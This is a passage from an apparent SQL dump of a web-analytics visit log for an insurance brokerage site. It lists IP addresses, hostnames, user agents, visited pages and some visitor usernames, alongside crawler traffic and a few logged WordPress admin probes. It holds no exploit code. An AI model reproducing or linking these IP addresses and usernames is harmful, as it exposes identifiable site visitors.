WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19109,'0b_29244303852579217792fe4658f16637','1461095289','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19110,'0b_29244303852579217792fe4658f16637','1461095290','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19113,'0b_29244303852579217792fe4658f16637','1461095295','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19115,'0b_3e6472cac233bed1b377ac8e9e7be59c','1461097169','104.250.159.218','104-250-159-218.static.gorillaservers.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','','','','','','','','0','0',0),(19118,'0b_dc3bdee1aae1963f4da1f6d19eedfa43','1461097579','192.154.110.2','192-154-110-2.static.gorillaservers.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','','','','','','','','0','0',0),(19119,'0b_dc3bdee1aae1963f4da1f6d19eedfa43','1461097583','192.154.110.2','192-154-110-2.static.gorillaservers.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(19121,'0b_88cc3703c29f6878010f71bd2b13a4c0','1461098330','180.76.15.136','baiduspider-180-76-15-136.crawl.baidu.com','/term-quotes/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(19122,'0b_12e1e60abc9692bf3f87cf04c9bc6c05','1461098747','69.30.213.138','69.30.213.138','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(19125,'0b_12e1e60abc9692bf3f87cf04c9bc6c05','1461098758','69.30.213.138','69.30.213.138','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19128,'0b_12e1e60abc9692bf3f87cf04c9bc6c05','1461098769','69.30.213.138','69.30.213.138','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(19130,'0b_28c88d85b7e95c3c2164dad4ad50249f','1461100193','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19131,'0b_85407b77654a512acd4ee26ca1815ea5','1461100199','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19133,'0b_85407b77654a512acd4ee26ca1815ea5','1461100207','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19134,'0b_85407b77654a512acd4ee26ca1815ea5','1461100210','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19137,'0b_ecf347ee85bfcb14f157755e876795ee','1461100371','176.31.39.23','176.31.39.23','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(19139,'0b_85407b77654a512acd4ee26ca1815ea5','1461100643','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19140,'0b_85407b77654a512acd4ee26ca1815ea5','1461100646','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19142,'0b_85407b77654a512acd4ee26ca1815ea5','1461100651','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19145,'0b_85407b77654a512acd4ee26ca1815ea5','1461100726','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19146,'0b_85407b77654a512acd4ee26ca1815ea5','1461100730','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19149,'0b_85407b77654a512acd4ee26ca1815ea5','1461100922','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19151,'0b_85407b77654a512acd4ee26ca1815ea5','1461100926','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19154,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101077','91.121.169.194','ns348917.ip-91-121-169.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19157,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101082','91.121.169.194','ns348917.ip-91-121-169.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19158,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101093','91.121.169.194','ns348917.ip-91-121-169.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19160,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101098','91.121.169.194','ns348917.ip-91-121-169.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19161,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101103','91.121.169.194','ns348917.ip-91-121-169.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19163,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101116','91.121.169.194','ns348917.ip-91-121-169.eu','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19166,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101129','91.121.169.194','ns348917.ip-91-121-169.eu','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19169,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101139','91.121.169.194','ns348917.ip-91-121-169.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19170,'0b_e12faf4ca20f63e7c029ebdfe157623c','1461101141','91.121.169.194','ns348917.ip-91-121-169.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19173,'0b_85407b77654a512acd4ee26ca1815ea5','1461101152','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19175,'0b_85407b77654a512acd4ee26ca1815ea5','1461101156','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19176,'0b_67250d98d8791ce8e376d8ba9404b024','1461101865','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(19178,'0b_ecdad11632177cdaa1aa5bc0a44ee522','1461104402','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19179,'0b_ecdad11632177cdaa1aa5bc0a44ee522','1461104404','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19182,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107233','151.80.44.115','mj5.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19184,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107236','151.80.44.115','mj5.naefmarco.ch','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19185,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107238','151.80.44.115','mj5.naefmarco.ch','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19187,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107243','151.80.44.115','mj5.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19190,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107246','151.80.44.115','mj5.naefmarco.ch','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19193,'0b_eeab7f1ef61af5915f06acccd56188f6','1461107249','151.80.44.115','mj5.naefmarco.ch','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','3','0',0),(19194,'0b_2b204d0c86defc2b65a7509f8c84fde7','1461107687','108.58.164.26','ool-6c3aa41a.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','','','','','','','0','0',0),(19196,'0b_2b204d0c86defc2b65a7509f8c84fde7','1461107689','108.58.164.26','ool-6c3aa41a.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','','','','','','','0','0',0),(19197,'0b_a2024863be286e7e2bdfde0058873824','1461109269','141.8.143.235','spider-141-8-143-235.yandex.com','/contact/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19199,'0b_67282dd1c6e0c5f0ea105f3a19222555','1461112086','23.94.228.76','23-94-228-76-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(19200,'0b_e97fc5729e2351abdd801e27434f8b3f','1461114074','141.8.143.155','spider-141-8-143-155.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(19203,'0b_227a306119f9219ebeda8ba21c014828','1461114076','141.8.143.217','spider-141-8-143-217.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19206,'0b_b351a2d21ea047c9b3b657ba18609e42','1461114191','100.43.91.11','spider-100-43-91-11.yandex.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19209,'0b_9b1e5934e9c78c6e41021d2d40e3a1d6','1461115864','207.46.13.10','msnbot-207-46-13-10.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19211,'0b_eb10ec88aed97d2fec53a30c7ad5c75e','1461118512','159.122.253.173','ad.fd.7a9f.ip4.static.sl-reverse.com','/?author=1','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','us','','','','','','','0','0',0),(19214,'0b_028c5ea7e20ec0aae9faac2275b5c4ee','1461119711','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(19215,'0b_028c5ea7e20ec0aae9faac2275b5c4ee','1461119713','71.177.184.59','static-71-177-184-59.lsanca.fios.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html','http://www.empireins.com/','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(19218,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120977','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19221,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120981','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19224,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120982','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19226,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120983','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19227,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120984','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19230,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120984','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19232,'0b_28e3fed5bbfcbac81da823d04a93593f','1461120985','157.55.39.197','msnbot-157-55-39-197.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19233,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121039','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19236,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121040','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19238,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121042','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19239,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121042','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19241,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121043','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19242,'0b_917340f122f01335c47c3646a0081bca','1461121044','157.55.39.19','msnbot-157-55-39-19.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19244,'0b_ea28de7ea1e00d409c89c0b365e5c493','1461121044','207.46.13.49','msnbot-207-46-13-49.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19245,'0b_917340f122f01335c47c3646a0081bca','1461121044','157.55.39.19','msnbot-157-55-39-19.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19248,'0b_917340f122f01335c47c3646a0081bca','1461121045','157.55.39.19','msnbot-157-55-39-19.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19250,'0b_28e3fed5bbfcbac81da823d04a93593f','1461121059','157.55.39.124','msnbot-157-55-39-124.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19253,'0b_28e3fed5bbfcbac81da823d04a93593f','1461121066','157.55.39.124','msnbot-157-55-39-124.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19254,'0b_28e3fed5bbfcbac81da823d04a93593f','1461121067','157.55.39.124','msnbot-157-55-39-124.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19257,'0b_28e3fed5bbfcbac81da823d04a93593f','1461121068','157.55.39.124','msnbot-157-55-39-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19260,'0b_cd5c1aa3f92f8605b6067f801ff861a4','1461121221','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19263,'0b_b27342fb80be3e7bd6beb1ccc97f61c8','1461123188','195.154.250.133','dedi-195-154-250-133.cloudlinkd.com','/','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/','',0,'WinXP','Firefox 3','us','','','','','','','3','0',0),(19265,'0b_b27342fb80be3e7bd6beb1ccc97f61c8','1461123192','195.154.250.133','dedi-195-154-250-133.cloudlinkd.com','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/wp-admin/admin-ajax.php','',0,'WinXP','Firefox 3','us','','','','','','','3','0',0),(19268,'0b_ae9290f6dce5e91d718bc9022efd707b','1461123569','195.154.250.133','dedi-195-154-250-133.cloudlinkd.com','/samplc.php.suspected_','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.googlebot.com/bot.html','',0,'','','','','','Spoofer bot','','','','0','0',0),(19271,'0b_40f5e2e4636ae4f88fc78241486fb4d4','1461123690','203.59.236.104','203-59-236-104.perm.iinet.net.au','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&sqi=2&ved=0ahUKEwj77NHvpZzMAhWDopQKHWtACJwQFgg6MAM&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.119745492,d.dGo','',0,'Win7 x64','IE 11','au','1920 x 1080','','','','','','0','0',0),(19272,'0b_40f5e2e4636ae4f88fc78241486fb4d4','1461123694','203.59.236.104','203-59-236-104.perm.iinet.net.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1920 x 1080','','','','','','0','0',0),(19275,'0b_40f5e2e4636ae4f88fc78241486fb4d4','1461123701','203.59.236.104','203-59-236-104.perm.iinet.net.au','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1920 x 1080','','','','','','0','0',0),(19277,'0b_40f5e2e4636ae4f88fc78241486fb4d4','1461123708','203.59.236.104','203-59-236-104.perm.iinet.net.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','1920 x 1080','','','','','','0','0',0),(19278,'0b_340f046e464e3710388db993c2fbeb3b','1461125317','172.245.100.87','172-245-100-87-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(19280,'0b_a8455e07ae5872768e669b1e51eac0c6','1461126008','66.249.64.84','crawl-66-249-64-84.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19283,'0b_a8455e07ae5872768e669b1e51eac0c6','1461126009','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19284,'0b_1ea6a5d6f38885f69bde85d279af84e5','1461126014','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(19286,'0b_1ea6a5d6f38885f69bde85d279af84e5','1461126018','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(19289,'0b_3d632b549d7c13dba370f7c1296d42e7','1461127581','176.9.131.69','static.69.131.9.176.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(19290,'0b_3d632b549d7c13dba370f7c1296d42e7','1461127583','176.9.131.69','static.69.131.9.176.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(19293,'0b_671c698106b8fcca1d61c91ebfe9cfb8','1461128346','157.55.39.124','msnbot-157-55-39-124.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19295,'0b_3e887546f20163bedaadd2e95464458d','1461128834','207.46.13.185','msnbot-207-46-13-185.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19296,'0b_2c130546edd19450c76b9f5c26b1b5b2','1461130304','75.102.23.105','unknown.hostforweb.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(19298,'0b_4bb1f75348627a965764f22b01d24c48','1461132044','65.55.210.58','msnbot-65-55-210-58.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(19301,'0b_4d2949754cf9b2bf4b25b0ad042e2c48','1461139793','69.163.208.103','mannochmore.dreamhost.com','/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19304,'0b_aaef51ef05ae544ac6d2732c35bf70e0','1461140268','75.119.221.245','gefjun.dreamhost.com','/test/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19305,'0b_68aa95d44d090c4aa6204e87f5396fe3','1461140752','79.170.44.83','web83.extendcp.co.uk','/wordpress/wp-admin/','','','',0,'','','gb','','','Unknown Spider','','','','0','0',0),(19307,'0b_80b43d250bbc49bd6fc90214e9a50d2b','1461141236','216.239.136.47','cl37.omnis.com','/blog/wp-admin/','','','',0,'','','','','','Unknown 